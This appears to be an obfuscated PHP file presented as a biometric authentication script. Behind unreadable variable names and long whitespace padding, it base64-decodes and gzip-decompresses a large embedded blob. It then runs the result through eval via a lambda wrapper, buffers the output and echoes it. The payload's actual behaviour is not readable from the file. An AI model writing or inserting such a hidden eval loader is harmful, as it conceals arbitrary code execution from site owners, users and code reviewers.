<?php 
        $__='printf';$_='Loading biometric_auth1_php_';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
